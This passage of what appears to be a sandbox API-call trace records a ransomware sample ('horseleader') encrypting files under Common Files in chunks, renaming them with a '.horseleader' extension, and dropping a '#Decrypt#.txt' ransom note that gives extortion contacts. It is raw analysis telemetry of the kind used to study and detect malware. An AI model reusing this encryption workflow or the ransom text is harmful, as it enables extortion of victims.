DB\\xmlrw.dll") returned 57 [0251.307] StrStrIW (lpFirst="xmlrw.dll", lpSrch=".horseleader") returned 0x0 [0251.307] lstrcmpW (lpString1="xmlrw.dll", lpString2="#Decrypt#.txt") returned 1 [0251.307] lstrcmpW (lpString1="xmlrw.dll", lpString2="_uninstalling_.png") returned 1 [0251.307] lstrlenW (lpString=".testttjffg") returned 11 [0251.307] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll", lpSrch=".testttjffg") returned 0x0 [0251.307] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.307] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.307] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrw.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.309] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll") returned 57 [0251.309] StrStrW (lpFirst="xmlrw.dll", lpSrch=".txt") returned 0x0 [0251.309] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=282136) returned 1 [0251.309] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.309] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.312] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.312] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.313] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1ff0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.313] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.314] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.314] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.314] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3fe18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.315] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.317] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.317] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.317] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.317] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0251.317] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0251.317] CloseHandle (hObject=0x158) returned 1 [0251.317] GetProcessHeap () returned 0x780000 [0251.318] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.318] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll.horseleader") returned 69 [0251.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrw.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrw.dll.horseleader" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrw.dll.horseleader")) returned 1 [0251.319] GetProcessHeap () returned 0x780000 [0251.319] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.319] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7a4200, ftCreationTime.dwHighDateTime=0x1c8e202, ftLastAccessTime.dwLowDateTime=0x516f5b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbc7a4200, ftLastWriteTime.dwHighDateTime=0x1c8e202, nFileSizeHigh=0x0, nFileSizeLow=0x30a18, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="xmlrwbin.dll", cAlternateFileName="")) returned 1 [0251.319] lstrcmpiW (lpString1="xmlrwbin.dll", lpString2="Windows") returned 1 [0251.319] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll") returned 60 [0251.319] StrStrIW (lpFirst="xmlrwbin.dll", lpSrch=".horseleader") returned 0x0 [0251.319] lstrcmpW (lpString1="xmlrwbin.dll", lpString2="#Decrypt#.txt") returned 1 [0251.319] lstrcmpW (lpString1="xmlrwbin.dll", lpString2="_uninstalling_.png") returned 1 [0251.319] lstrlenW (lpString=".testttjffg") returned 11 [0251.319] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll", lpSrch=".testttjffg") returned 0x0 [0251.319] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.320] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.320] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrwbin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.321] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll") returned 60 [0251.321] StrStrW (lpFirst="xmlrwbin.dll", lpSrch=".txt") returned 0x0 [0251.321] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=199192) returned 1 [0251.321] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.321] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.324] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.324] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.324] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x15d0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.328] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.329] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.329] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.329] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2ba18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.329] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.330] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0251.330] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0251.331] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0251.331] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0251.331] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0251.331] CloseHandle (hObject=0x158) returned 1 [0251.331] GetProcessHeap () returned 0x780000 [0251.331] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.331] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll.horseleader") returned 72 [0251.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrwbin.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\xmlrwbin.dll.horseleader" (normalized: "c:\\program files\\common files\\system\\ole db\\xmlrwbin.dll.horseleader")) returned 1 [0251.333] GetProcessHeap () returned 0x780000 [0251.333] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.333] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7a4200, ftCreationTime.dwHighDateTime=0x1c8e202, ftLastAccessTime.dwLowDateTime=0x516f5b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbc7a4200, ftLastWriteTime.dwHighDateTime=0x1c8e202, nFileSizeHigh=0x0, nFileSizeLow=0x30a18, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="xmlrwbin.dll", cAlternateFileName="")) returned 0 [0251.333] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0251.333] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\#Decrypt#.txt") returned 61 [0251.333] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\ole db\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0251.333] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.333] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0251.335] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.335] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0251.335] CloseHandle (hObject=0x21c) returned 1 [0251.335] GetProcessHeap () returned 0x780000 [0251.335] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0251.335] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc5390a1, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xcc5390a1, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x4556f160, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xd8800, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0251.335] lstrcmpiW (lpString1="wab32.dll", lpString2="Windows") returned -1 [0251.335] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll") returned 50 [0251.335] StrStrIW (lpFirst="wab32.dll", lpSrch=".horseleader") returned 0x0 [0251.335] lstrcmpW (lpString1="wab32.dll", lpString2="#Decrypt#.txt") returned 1 [0251.335] lstrcmpW (lpString1="wab32.dll", lpString2="_uninstalling_.png") returned 1 [0251.336] lstrlenW (lpString=".testttjffg") returned 11 [0251.336] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll", lpSrch=".testttjffg") returned 0x0 [0251.336] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.336] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.336] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32.dll" (normalized: "c:\\program files\\common files\\system\\wab32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.336] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f46d56, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xc0f46d56, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x1f9ed5b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x10c400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="wab32res.dll", cAlternateFileName="")) returned 1 [0251.336] lstrcmpiW (lpString1="wab32res.dll", lpString2="Windows") returned -1 [0251.336] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll") returned 53 [0251.336] StrStrIW (lpFirst="wab32res.dll", lpSrch=".horseleader") returned 0x0 [0251.336] lstrcmpW (lpString1="wab32res.dll", lpString2="#Decrypt#.txt") returned 1 [0251.336] lstrcmpW (lpString1="wab32res.dll", lpString2="_uninstalling_.png") returned 1 [0251.336] lstrlenW (lpString=".testttjffg") returned 11 [0251.336] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll", lpSrch=".testttjffg") returned 0x0 [0251.336] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.336] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.337] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\wab32res.dll" (normalized: "c:\\program files\\common files\\system\\wab32res.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.337] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f46d56, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xc0f46d56, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x1f9ed5b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x10c400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="wab32res.dll", cAlternateFileName="")) returned 0 [0251.337] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0251.337] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\#Decrypt#.txt") returned 54 [0251.337] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0251.338] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.338] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0251.339] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.339] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, 